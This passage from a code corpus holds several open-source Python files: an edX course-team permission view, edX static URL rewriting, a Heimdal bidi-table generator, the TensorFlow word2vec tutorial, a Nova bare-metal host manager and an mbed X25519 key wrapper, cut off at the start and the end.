        distribCf = self._mDistributionAnalyzer.get_confidence()
        return max(contxtCf, distribCf)
| mit |
geekaia/edx-platform | cms/djangoapps/contentstore/views/user.py | 27 | 7158 | from django.core.exceptions import PermissionDenied
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_http_methods
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_POST
from django_future.csrf import ensure_csrf_cookie
from edxmako.shortcuts import render_to_response
from xmodule.modulestore.django import modulestore
from opaque_keys.edx.keys import CourseKey
from util.json_request import JsonResponse, expect_json
from student.roles import CourseInstructorRole, CourseStaffRole
from course_creators.views import user_requested_access
from .access import has_course_access
from student.models import CourseEnrollment
from django.http import HttpResponseNotFound
from student import auth
__all__ = ['request_course_creator', 'course_team_handler']
@require_POST
@login_required
def request_course_creator(request):
    """
    User has requested course creation access.

    Records the request for the authenticated user and always acknowledges.
    """
    user_requested_access(request.user)
    return JsonResponse({"Status": "OK"})
# pylint: disable=unused-argument
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT", "DELETE"))
def course_team_handler(request, course_key_string=None, email=None):
    """
    The restful handler for course team users.
    GET
        html: return html page for managing course team
        json: return json representation of a particular course team member (email is required).
    POST or PUT
        json: modify the permissions for a particular course team member (email is required, as well as role in the payload).
    DELETE:
        json: remove a particular course team member from the course team (email is required).
    """
    # None course_key means the URL carried no course id at all.
    course_key = CourseKey.from_string(course_key_string) if course_key_string else None
    if not has_course_access(request.user, course_key):
        raise PermissionDenied()
    # JSON wins the content negotiation: a missing Accept header defaults to
    # JSON, and only an explicit non-JSON GET falls through to the HTML page.
    if 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
        return _course_team_user(request, course_key, email)
    elif request.method == 'GET':  # assume html
        return _manage_users(request, course_key)
    else:
        return HttpResponseNotFound()
def _manage_users(request, course_key):
    """
    This view will return all CMS users who are editors for the specified course
    """
    # check that logged in user has permissions to this item
    if not has_course_access(request.user, course_key):
        raise PermissionDenied()
    course_module = modulestore().get_course(course_key)
    instructors = CourseInstructorRole(course_key).users_with_role()
    # the page only lists staff and assumes they're a superset of instructors. Do a union to ensure.
    staff = set(CourseStaffRole(course_key).users_with_role()).union(instructors)
    return render_to_response('manage_users.html', {
        'context_course': course_module,
        'staff': staff,
        'instructors': instructors,
        # only users with the instructor role may add/remove team members
        'allow_actions': has_course_access(request.user, course_key, role=CourseInstructorRole),
    })
@expect_json
def _course_team_user(request, course_key, email):
    """
    Handle the add, remove, promote, demote requests ensuring the requester has authority

    GET returns the target user's highest role; DELETE removes them from the
    course team; POST/PUT set the role from the request payload
    ('instructor' or 'staff').  Errors come back as JSON with 4xx statuses.
    """
    # check that logged in user has permissions to this item
    if has_course_access(request.user, course_key, role=CourseInstructorRole):
        # instructors have full permissions
        pass
    elif has_course_access(request.user, course_key, role=CourseStaffRole) and email == request.user.email:
        # staff can only affect themselves
        pass
    else:
        msg = {
            "error": _("Insufficient permissions")
        }
        return JsonResponse(msg, 400)
    try:
        user = User.objects.get(email=email)
    except Exception:
        msg = {
            "error": _("Could not find user by email address '{email}'.").format(email=email),
        }
        return JsonResponse(msg, 404)
    # role hierarchy: globalstaff > "instructor" > "staff" (in a course)
    if request.method == "GET":
        # just return info about the user
        msg = {
            "email": user.email,
            "active": user.is_active,
            "role": None,
        }
        # what's the highest role that this user has? (How should this report global staff?)
        for role in [CourseInstructorRole(course_key), CourseStaffRole(course_key)]:
            if role.has_user(user):
                msg["role"] = role.ROLE
                break
        return JsonResponse(msg)
    # can't modify an inactive user
    if not user.is_active:
        msg = {
            "error": _('User {email} has registered but has not yet activated his/her account.').format(email=email),
        }
        return JsonResponse(msg, 400)
    if request.method == "DELETE":
        try:
            # Refuse the removal if it would leave the course with no instructor.
            try_remove_instructor(request, course_key, user)
        except CannotOrphanCourse as oops:
            return JsonResponse(oops.msg, 400)
        auth.remove_users(request.user, CourseStaffRole(course_key), user)
        return JsonResponse()
    # all other operations require the requesting user to specify a role
    role = request.json.get("role", request.POST.get("role"))
    if role is None:
        return JsonResponse({"error": _("`role` is required")}, 400)
    if role == "instructor":
        if not has_course_access(request.user, course_key, role=CourseInstructorRole):
            msg = {
                "error": _("Only instructors may create other instructors")
            }
            return JsonResponse(msg, 400)
        auth.add_users(request.user, CourseInstructorRole(course_key), user)
        # auto-enroll the course creator in the course so that "View Live" will work.
        CourseEnrollment.enroll(user, course_key)
    elif role == "staff":
        # add to staff regardless (can't do after removing from instructors as will no longer
        # be allowed)
        auth.add_users(request.user, CourseStaffRole(course_key), user)
        try:
            try_remove_instructor(request, course_key, user)
        except CannotOrphanCourse as oops:
            return JsonResponse(oops.msg, 400)
        # auto-enroll the course creator in the course so that "View Live" will work.
        CourseEnrollment.enroll(user, course_key)
    return JsonResponse()
class CannotOrphanCourse(Exception):
    """
    Exception raised if an attempt is made to remove all responsible instructors from course.

    The ``msg`` attribute holds a JSON-serializable error payload that
    callers turn into an HTTP response.
    """
    def __init__(self, msg):
        # Keep the payload where existing handlers expect it (oops.msg).
        self.msg = msg
        # Pass msg to the base class too so str()/repr() and log output show
        # the reason (the original called Exception.__init__ with no args,
        # leaving the exception's message empty).
        super(CannotOrphanCourse, self).__init__(msg)
def try_remove_instructor(request, course_key, user):
    """
    Remove *user* from the course's instructor role, refusing (with
    CannotOrphanCourse) when they are the last remaining instructor.
    No-op when the user is not an instructor at all.
    """
    role = CourseInstructorRole(course_key)
    if not role.has_user(user):
        return
    if role.users_with_role().count() == 1:
        # Courses must always keep at least one responsible instructor.
        raise CannotOrphanCourse(
            {"error": _("You may not remove the last instructor from a course")}
        )
    auth.remove_users(request.user, role, user)
| agpl-3.0 |
kernevil/samba | source4/heimdal/lib/wind/gen-bidi.py | 6 | 3258 | #!/usr/local/bin/python
# -*- coding: iso-8859-1 -*-
# $Id$
# Copyright (c) 2004 Kungliga Tekniska Högskolan
# (Royal Institute of Technology, Stockholm, Sweden).
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Institute nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
import re
import string
import sys
import generate
import rfc3454
# Command line: gen-bidi.py <rfc3454.txt> <output-dir>
if len(sys.argv) != 3:
    print("usage: %s rfc3454.txt outdir" % sys.argv[0])
    sys.exit(1)
# Parse the RFC 3454 (stringprep) appendix tables, keyed by name ('D.1', ...).
tables = rfc3454.read(sys.argv[1])
# Open the generated header/implementation pair in the output directory.
bidi_h = generate.Header('%s/bidi_table.h' % sys.argv[2])
bidi_c = generate.Implementation('%s/bidi_table.c' % sys.argv[2])
bidi_h.file.write(
'''
#include <krb5-types.h>
struct range_entry {
  uint32_t start;
  unsigned len;
};
extern const struct range_entry _wind_ral_table[];
extern const struct range_entry _wind_l_table[];
extern const size_t _wind_ral_table_size;
extern const size_t _wind_l_table_size;
''')
bidi_c.file.write(
'''
#include "bidi_table.h"
#include <stdlib.h>
''')
def printTable(file, table, variable, source=None):
    """Write one RFC 3454 table as a C array named *variable* into *file*.

    Each table line is either a hex range 'XXXX-YYYY' or a single hex code
    point 'XXXX'; one ``{start, len}`` initializer is emitted per line,
    followed by a ``<variable>_size`` element count.

    source: optional mapping of table name -> list of lines; defaults to the
    module-global ``tables`` parsed from rfc3454.txt, so existing call sites
    are unchanged.
    """
    lines = (tables if source is None else source)[table]
    # Compile once instead of re-matching string patterns per line.
    range_re = re.compile('^ *([0-9A-F]+)-([0-9A-F]+) *$')
    single_re = re.compile('^ *([0-9A-F]+) *$')
    file.write("const struct range_entry %s[] = {\n" % variable)
    count = 0
    for l in lines:
        m = range_re.search(l)
        if m:
            start = int(m.group(1), 16)
            end = int(m.group(2), 16)
            file.write("  {0x%x, 0x%x},\n" % (start, end - start + 1))
            count += 1
        else:
            m = single_re.search(l)
            if m:
                v = int(m.group(1), 16)
                file.write("  {0x%x, 1},\n" % v)
                count += 1
    file.write("};\n\n")
    file.write("const size_t %s_size = %u;\n\n" % (variable, count))
# Emit the two bidi tables (RFC 3454 appendix D.1 feeds the R/AL table,
# D.2 the L table), then finalize both generated files.
printTable(bidi_c.file, 'D.1', '_wind_ral_table')
printTable(bidi_c.file, 'D.2', '_wind_l_table')
bidi_h.close()
bidi_c.close()
| gpl-3.0 |
naresh21/synergetics-edx-platform | common/djangoapps/static_replace/__init__.py | 22 | 8453 | import logging
import re
from django.contrib.staticfiles.storage import staticfiles_storage
from django.contrib.staticfiles import finders
from django.conf import settings
from static_replace.models import AssetBaseUrlConfig, AssetExcludedExtensionsConfig
from xmodule.modulestore.django import modulestore
from xmodule.modulestore import ModuleStoreEnum
from xmodule.contentstore.content import StaticContent
from opaque_keys.edx.locator import AssetLocator
log = logging.getLogger(__name__)
XBLOCK_STATIC_RESOURCE_PREFIX = '/static/xblock'
def _url_replace_regex(prefix):
    """
    Match static urls in quotes that don't end in '?raw'.
    To anyone contemplating making this more complicated:
    http://xkcd.com/1171/
    """
    # NOTE: ``ur"..."`` is a Python 2 raw-unicode literal (syntax error on
    # Python 3).  The '#' lines inside the template are re.VERBOSE comments
    # belonging to the regex itself, not Python comments.
    return ur"""
    (?x)                 # flags=re.VERBOSE
    (?P<quote>\\?['"])   # the opening quotes
    (?P<prefix>{prefix}) # the prefix
    (?P<rest>.*?)        # everything else in the url
    (?P=quote)           # the first matching closing quote
    """.format(prefix=prefix)
def try_staticfiles_lookup(path):
    """
    Try to lookup a path in staticfiles_storage. If it fails, return
    a dead link (the unmodified path) instead of raising an exception.
    """
    try:
        url = staticfiles_storage.url(path)
    except Exception as err:  # pylint: disable=broad-except
        # Deliberately broad: any storage-backend failure degrades to the
        # raw path rather than breaking page rendering.  Lazy %-style args
        # defer string formatting until the record is actually emitted.
        log.warning("staticfiles_storage couldn't find path %s: %s", path, err)
        # Just return the original path; don't kill everything.
        url = path
    return url
def replace_jump_to_id_urls(text, course_id, jump_to_id_base_url):
    """
    Rewrite '/jump_to_id/<id>' links so they redirect through the LMS
    jump_to handler, which resolves the id to the right courseware page.

    This mirrors replace_course_urls, but works from an author-provided id
    alone (no path needed), which also survives item moves in Studio.

    text: the content to rewrite
    course_id: the course in which the rewrite happens (kept for interface
        compatibility; not used in the substitution itself)
    jump_to_id_base_url: absolute app-tier path of the redirect handler,
        e.g. /courses/<org>/<course>/<run>/jump_to_id; the id captured from
        the link is appended to it
    returns: text with the links rewritten
    """
    def _rewrite(match):
        # Re-assemble the quoted link with the handler base spliced in
        # front of the captured id.
        quote = match.group('quote')
        return quote + jump_to_id_base_url + match.group('rest') + quote
    return re.sub(_url_replace_regex('/jump_to_id/'), _rewrite, text)
def replace_course_urls(text, course_key):
    """
    Rewrite '/course/...' links into '/courses/<course_id>/...' links.

    text: the text to rewrite
    course_key: a CourseKey; its deprecated string form becomes the id
    returns: text with the links replaced
    """
    course_id = course_key.to_deprecated_string()

    def _rewrite(match):
        quote = match.group('quote')
        rewritten = '/courses/' + course_id + '/' + match.group('rest')
        return quote + rewritten + quote
    return re.sub(_url_replace_regex('/course/'), _rewrite, text)
def process_static_urls(text, replacement_function, data_dir=None):
    """
    Run an arbitrary replacement function on any urls matching the static file
    directory

    replacement_function receives (full_match, prefix, quote, rest) for each
    matched URL and returns the replacement text.  data_dir, when given, is
    excluded from matching via a negative lookahead.
    """
    def wrap_part_extraction(match):
        """
        Unwraps a match group for the captures specified in _url_replace_regex
        and forward them on as function arguments
        """
        original = match.group(0)
        prefix = match.group('prefix')
        quote = match.group('quote')
        rest = match.group('rest')
        # Don't rewrite XBlock resource links. Probably wasn't a good idea that /static
        # works for actual static assets and for magical course asset URLs....
        full_url = prefix + rest
        # NOTE: ``unicode`` is the Python 2 builtin; this module predates py3.
        starts_with_static_url = full_url.startswith(unicode(settings.STATIC_URL))
        starts_with_prefix = full_url.startswith(XBLOCK_STATIC_RESOURCE_PREFIX)
        contains_prefix = XBLOCK_STATIC_RESOURCE_PREFIX in full_url
        if starts_with_prefix or (starts_with_static_url and contains_prefix):
            return original
        return replacement_function(original, prefix, quote, rest)
    # Match either the deployed STATIC_URL or the raw /static/ prefix, but
    # never the course data_dir itself.
    return re.sub(
        _url_replace_regex(u'(?:{static_url}|/static/)(?!{data_dir})'.format(
            static_url=settings.STATIC_URL,
            data_dir=data_dir
        )),
        wrap_part_extraction,
        text
    )
def make_static_urls_absolute(request, html):
    """
    Converts relative URLs referencing static assets to absolute URLs
    """
    def _absolutize(__, prefix, quote, rest):
        """Perform a single relative -> absolute url replacement."""
        absolute_url = request.build_absolute_uri(prefix + rest)
        return "".join([quote, absolute_url, quote])

    return process_static_urls(html, _absolutize)
def replace_static_urls(text, data_directory=None, course_id=None, static_asset_path=''):
    """
    Replace /static/$stuff urls either with their correct url as generated by collectstatic,
    (/static/$md5_hashed_stuff) or by the course-specific content static url
    /static/$course_data_dir/$stuff, or, if course_namespace is not None, by the
    correct url in the contentstore (/c4x/.. or /asset-loc:..)

    text: The source text to do the substitution in
    data_directory: The directory in which course data is stored
    course_id: The course identifier used to distinguish static content for this course in studio
    static_asset_path: Path for static assets, which overrides data_directory and course_namespace, if nonempty
    """
    def replace_static_url(original, prefix, quote, rest):
        """
        Replace a single matched url.

        original: the full matched text (returned unchanged when no rewrite applies)
        prefix/quote/rest: named captures produced by _url_replace_regex
        """
        # Don't mess with things that end in '?raw'
        if rest.endswith('?raw'):
            return original

        # In debug mode, if we can find the url as is,
        if settings.DEBUG and finders.find(rest, True):
            return original
        # if we're running with a MongoBacked store course_namespace is not None, then use studio style urls
        elif (not static_asset_path) and course_id:
            # first look in the static file pipeline and see if we are trying to reference
            # a piece of static content which is in the edx-platform repo (e.g. JS associated with an xmodule)
            exists_in_staticfiles_storage = False
            try:
                exists_in_staticfiles_storage = staticfiles_storage.exists(rest)
            except Exception as err:
                # Best-effort lookup: a storage backend failure simply means we
                # fall through to the course-content lookup below.
                log.warning("staticfiles_storage couldn't find path {0}: {1}".format(
                    rest, str(err)))

            if exists_in_staticfiles_storage:
                url = staticfiles_storage.url(rest)
            else:
                # if not, then assume it's courseware specific content and then look in the
                # Mongo-backed database
                base_url = AssetBaseUrlConfig.get_base_url()
                excluded_exts = AssetExcludedExtensionsConfig.get_excluded_extensions()
                url = StaticContent.get_canonicalized_asset_path(course_id, rest, base_url, excluded_exts)
                # NOTE(review): 'block@' -> 'block/' is applied once, presumably to
                # produce the URL-path form of the asset locator — confirm against
                # AssetLocator serialization conventions.
                if AssetLocator.CANONICAL_NAMESPACE in url:
                    url = url.replace('block@', 'block/', 1)
        # Otherwise, look the file up in staticfiles_storage, and append the data directory if needed
        else:
            course_path = "/".join((static_asset_path or data_directory, rest))
            try:
                if staticfiles_storage.exists(rest):
                    url = staticfiles_storage.url(rest)
                else:
                    url = staticfiles_storage.url(course_path)
            # And if that fails, assume that it's course content, and add manually data directory
            except Exception as err:
                log.warning("staticfiles_storage couldn't find path {0}: {1}".format(
                    rest, str(err)))
                url = "".join([prefix, course_path])

        return "".join([quote, url, quote])

    return process_static_urls(text, replace_static_url, data_dir=static_asset_path or data_directory)
| agpl-3.0 |
tntnatbry/tensorflow | tensorflow/examples/tutorials/word2vec/word2vec_basic.py | 5 | 9272 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import os
import random
import zipfile
import numpy as np
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
# Step 1: Download the data.
url = 'http://mattmahoney.net/dc/'
def maybe_download(filename, expected_bytes):
    """Download a file if not present, and make sure it's the right size."""
    if not os.path.exists(filename):
        filename, _ = urllib.request.urlretrieve(url + filename, filename)
    actual_size = os.stat(filename).st_size
    if actual_size != expected_bytes:
        print(actual_size)
        raise Exception(
            'Failed to verify ' + filename + '. Can you get to it with a browser?')
    print('Found and verified', filename)
    return filename
filename = maybe_download('text8.zip', 31344016)
# Read the data into a list of strings.
def read_data(filename):
    """Extract the first file enclosed in a zip file as a list of words"""
    with zipfile.ZipFile(filename) as archive:
        first_member = archive.namelist()[0]
        words = tf.compat.as_str(archive.read(first_member)).split()
    return words
words = read_data(filename)
print('Data size', len(words))
# Step 2: Build the dictionary and replace rare words with UNK token.
vocabulary_size = 50000
def build_dataset(words, n_words=None):
    """Turn a list of word tokens into a skip-gram training dataset.

    Backward-compatible generalization: the vocabulary size used to be the
    hard-coded module-level `vocabulary_size`; it can now be overridden via
    the optional `n_words` argument.

    Args:
      words: list of word tokens.
      n_words: number of distinct words to keep (including the 'UNK' bucket);
        defaults to the module-level `vocabulary_size`.

    Returns:
      data: list of integer word ids (0 == 'UNK') mirroring `words`.
      count: [word, frequency] pairs; count[0] is ['UNK', unk_count].
      dictionary: word -> id mapping.
      reverse_dictionary: id -> word mapping.
    """
    if n_words is None:
        n_words = vocabulary_size  # preserve the original module-level behavior
    count = [['UNK', -1]]
    count.extend(collections.Counter(words).most_common(n_words - 1))
    dictionary = dict()
    for word, _ in count:
        dictionary[word] = len(dictionary)
    data = list()
    unk_count = 0
    for word in words:
        if word in dictionary:
            index = dictionary[word]
        else:
            index = 0  # dictionary['UNK']
            unk_count += 1
        data.append(index)
    count[0][1] = unk_count
    reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
    return data, count, dictionary, reverse_dictionary
data, count, dictionary, reverse_dictionary = build_dataset(words)
del words # Hint to reduce memory.
print('Most common words (+UNK)', count[:5])
print('Sample data', data[:10], [reverse_dictionary[i] for i in data[:10]])
data_index = 0
# Step 3: Function to generate a training batch for the skip-gram model.
def generate_batch(batch_size, num_skips, skip_window):
  """Generate one skip-gram training batch from the module-level `data` list.

  batch_size: number of (center, context) examples to produce
  num_skips: context words sampled per center word (must divide batch_size
      and be <= 2 * skip_window)
  skip_window: words considered on each side of the center word

  Returns (batch, labels): int32 arrays of shape (batch_size,) and
  (batch_size, 1). Advances the module-level `data_index` cursor.
  """
  global data_index
  assert batch_size % num_skips == 0
  assert num_skips <= 2 * skip_window
  batch = np.ndarray(shape=(batch_size), dtype=np.int32)
  labels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)
  span = 2 * skip_window + 1  # [ skip_window target skip_window ]
  buffer = collections.deque(maxlen=span)
  # Prime the sliding window with the first `span` words (wrapping around).
  for _ in range(span):
    buffer.append(data[data_index])
    data_index = (data_index + 1) % len(data)
  for i in range(batch_size // num_skips):
    target = skip_window  # target label at the center of the buffer
    targets_to_avoid = [skip_window]
    for j in range(num_skips):
      # Sample a context position distinct from the center and from the
      # positions already used for this center word.
      while target in targets_to_avoid:
        target = random.randint(0, span - 1)
      targets_to_avoid.append(target)
      batch[i * num_skips + j] = buffer[skip_window]
      labels[i * num_skips + j, 0] = buffer[target]
    # Slide the window one word to the right (deque drops the oldest word).
    buffer.append(data[data_index])
    data_index = (data_index + 1) % len(data)
  # Backtrack a little bit to avoid skipping words in the end of a batch
  data_index = (data_index + len(data) - span) % len(data)
  return batch, labels
# Smoke-test the batch generator: print 8 (center -> context) pairs.
batch, labels = generate_batch(batch_size=8, num_skips=2, skip_window=1)
for i in range(8):
  print(batch[i], reverse_dictionary[batch[i]],
        '->', labels[i, 0], reverse_dictionary[labels[i, 0]])

# Step 4: Build and train a skip-gram model.

batch_size = 128
embedding_size = 128  # Dimension of the embedding vector.
skip_window = 1       # How many words to consider left and right.
num_skips = 2         # How many times to reuse an input to generate a label.

# We pick a random validation set to sample nearest neighbors. Here we limit the
# validation samples to the words that have a low numeric ID, which by
# construction are also the most frequent.
valid_size = 16     # Random set of words to evaluate similarity on.
valid_window = 100  # Only pick dev samples in the head of the distribution.
valid_examples = np.random.choice(valid_window, valid_size, replace=False)
num_sampled = 64    # Number of negative examples to sample.
# Build the skip-gram model graph: embedding lookup, NCE loss, SGD optimizer,
# and a cosine-similarity op for the validation words.
graph = tf.Graph()

with graph.as_default():

  # Input data.
  train_inputs = tf.placeholder(tf.int32, shape=[batch_size])
  train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])
  valid_dataset = tf.constant(valid_examples, dtype=tf.int32)

  # Ops and variables pinned to the CPU because of missing GPU implementation
  with tf.device('/cpu:0'):
    # Look up embeddings for inputs.
    embeddings = tf.Variable(
        tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))
    embed = tf.nn.embedding_lookup(embeddings, train_inputs)

    # Construct the variables for the NCE loss
    nce_weights = tf.Variable(
        tf.truncated_normal([vocabulary_size, embedding_size],
                            stddev=1.0 / math.sqrt(embedding_size)))
    nce_biases = tf.Variable(tf.zeros([vocabulary_size]))

  # Compute the average NCE loss for the batch.
  # tf.nce_loss automatically draws a new sample of the negative labels each
  # time we evaluate the loss.
  loss = tf.reduce_mean(
      tf.nn.nce_loss(weights=nce_weights,
                     biases=nce_biases,
                     labels=train_labels,
                     inputs=embed,
                     num_sampled=num_sampled,
                     num_classes=vocabulary_size))

  # Construct the SGD optimizer using a learning rate of 1.0.
  optimizer = tf.train.GradientDescentOptimizer(1.0).minimize(loss)

  # Compute the cosine similarity between minibatch examples and all embeddings.
  norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
  normalized_embeddings = embeddings / norm
  valid_embeddings = tf.nn.embedding_lookup(
      normalized_embeddings, valid_dataset)
  similarity = tf.matmul(
      valid_embeddings, normalized_embeddings, transpose_b=True)

  # Add variable initializer.
  # NOTE(review): tf.initialize_all_variables() is the pre-1.0 TF spelling;
  # newer releases use tf.global_variables_initializer() — confirm the pinned
  # TensorFlow version before changing.
  init = tf.initialize_all_variables()
# Step 5: Begin training.
num_steps = 100001

with tf.Session(graph=graph) as session:
  # We must initialize all variables before we use them.
  init.run()
  print("Initialized")

  average_loss = 0
  for step in xrange(num_steps):
    batch_inputs, batch_labels = generate_batch(
        batch_size, num_skips, skip_window)
    feed_dict = {train_inputs: batch_inputs, train_labels: batch_labels}

    # We perform one update step by evaluating the optimizer op (including it
    # in the list of returned values for session.run()
    _, loss_val = session.run([optimizer, loss], feed_dict=feed_dict)
    average_loss += loss_val

    if step % 2000 == 0:
      if step > 0:
        average_loss /= 2000
      # The average loss is an estimate of the loss over the last 2000 batches.
      print("Average loss at step ", step, ": ", average_loss)
      average_loss = 0

    # Note that this is expensive (~20% slowdown if computed every 500 steps)
    if step % 10000 == 0:
      sim = similarity.eval()
      for i in xrange(valid_size):
        valid_word = reverse_dictionary[valid_examples[i]]
        top_k = 8  # number of nearest neighbors
        # Skip index 0 (the word itself) and take the next top_k neighbors.
        nearest = (-sim[i, :]).argsort()[1:top_k + 1]
        log_str = "Nearest to %s:" % valid_word
        for k in xrange(top_k):
          close_word = reverse_dictionary[nearest[k]]
          log_str = "%s %s," % (log_str, close_word)
        print(log_str)
  final_embeddings = normalized_embeddings.eval()
# Step 6: Visualize the embeddings.
def plot_with_labels(low_dim_embs, labels, filename='tsne.png'):
  """Scatter-plot 2-D embeddings, annotating each point with its word label.

  Relies on the module-level `plt` (matplotlib.pyplot) imported in the
  try-block below.
  """
  assert low_dim_embs.shape[0] >= len(labels), "More labels than embeddings"
  plt.figure(figsize=(18, 18))  # in inches
  for idx, label in enumerate(labels):
    x_coord, y_coord = low_dim_embs[idx, :]
    plt.scatter(x_coord, y_coord)
    plt.annotate(label,
                 xy=(x_coord, y_coord),
                 xytext=(5, 2),
                 textcoords='offset points',
                 ha='right',
                 va='bottom')
  plt.savefig(filename)
# Step 6 continued: visualization is optional — it only runs when sklearn and
# matplotlib are importable; otherwise a hint is printed.
try:
  from sklearn.manifold import TSNE
  import matplotlib.pyplot as plt

  tsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000)
  plot_only = 500  # only project the 500 most frequent words
  low_dim_embs = tsne.fit_transform(final_embeddings[:plot_only, :])
  labels = [reverse_dictionary[i] for i in xrange(plot_only)]
  plot_with_labels(low_dim_embs, labels)

except ImportError:
  print("Please install sklearn, matplotlib, and scipy to visualize embeddings.")
| apache-2.0 |
srajag/nova | nova/scheduler/baremetal_host_manager.py | 18 | 1522 | # Copyright (c) 2012 NTT DOCOMO, INC.
# Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manage hosts in the current zone.
"""
import nova.scheduler.base_baremetal_host_manager as bbhm
from nova.scheduler import host_manager
class BaremetalNodeState(bbhm.BaseBaremetalNodeState):
    """Mutable and immutable information tracked for a host.

    This is an attempt to remove the ad-hoc data structures
    previously used and lock down access.
    """
    # Marker subclass: all behavior comes from BaseBaremetalNodeState; it
    # exists so BaremetalHostManager can return a distinct type for
    # bare-metal compute nodes (see host_state_cls below).
    pass
class BaremetalHostManager(bbhm.BaseBaremetalHostManager):
    """Bare-Metal HostManager class."""

    def host_state_cls(self, host, node, **kwargs):
        """Factory function/property to create a new HostState.

        Returns a BaremetalNodeState when the compute record identifies a
        bare-metal CPU, otherwise a regular HostState.
        """
        compute = kwargs.get('compute')
        is_baremetal = bool(compute) and compute.get('cpu_info') == 'baremetal cpu'
        state_cls = BaremetalNodeState if is_baremetal else host_manager.HostState
        return state_cls(host, node, **kwargs)
| apache-2.0 |
adfernandes/mbed | tools/psa/tfm/bin_utils/imgtool/keys/x25519.py | 5 | 3878 | # Original code taken from mcuboot project at:
# https://github.com/mcu-tools/mcuboot
# Git SHA of the original version: a8e12dae381080e898cea0c6f7408009b0163f9f
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
X25519 key management
"""
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import x25519
from .general import KeyClass
class X25519UsageError(Exception):
    """Raised when an operation requiring the private key is attempted on a
    public-only X25519 key."""
    pass
class X25519Public(KeyClass):
    """Wrapper around an X25519 public key (no private half available)."""

    def __init__(self, key):
        self.key = key

    def shortname(self):
        return "x25519"

    def _unsupported(self, name):
        # Public-only keys cannot perform private-key operations.
        raise X25519UsageError("Operation {} requires private key".format(name))

    def _get_public(self):
        return self.key

    def get_public_bytes(self):
        # The key is embedded into MBUboot in "SubjectPublicKeyInfo" format
        public = self._get_public()
        return public.public_bytes(
            encoding=serialization.Encoding.DER,
            format=serialization.PublicFormat.SubjectPublicKeyInfo)

    def get_private_bytes(self, minimal):
        self._unsupported('get_private_bytes')

    def export_private(self, path, passwd=None):
        self._unsupported('export_private')

    def export_public(self, path):
        """Write the public key to the given file."""
        pem_bytes = self._get_public().public_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PublicFormat.SubjectPublicKeyInfo)
        with open(path, 'wb') as out:
            out.write(pem_bytes)

    def sig_type(self):
        return "X25519"

    def sig_tlv(self):
        return "X25519"

    def sig_len(self):
        return 32
class X25519(X25519Public):
    """
    Wrapper around an X25519 private key.
    """

    def __init__(self, key):
        """key should be an instance of EllipticCurvePrivateKey"""
        # NOTE(review): despite the docstring, generate() constructs this with
        # an x25519.X25519PrivateKey — confirm and fix the docstring upstream.
        self.key = key

    @staticmethod
    def generate():
        """Generate a fresh X25519 private key pair."""
        pk = x25519.X25519PrivateKey.generate()
        return X25519(pk)

    def _get_public(self):
        # Derive the public half from the private key.
        return self.key.public_key()

    def get_private_bytes(self, minimal):
        # Unencrypted PKCS#8 DER; `minimal` is accepted for interface
        # compatibility but unused here.
        return self.key.private_bytes(
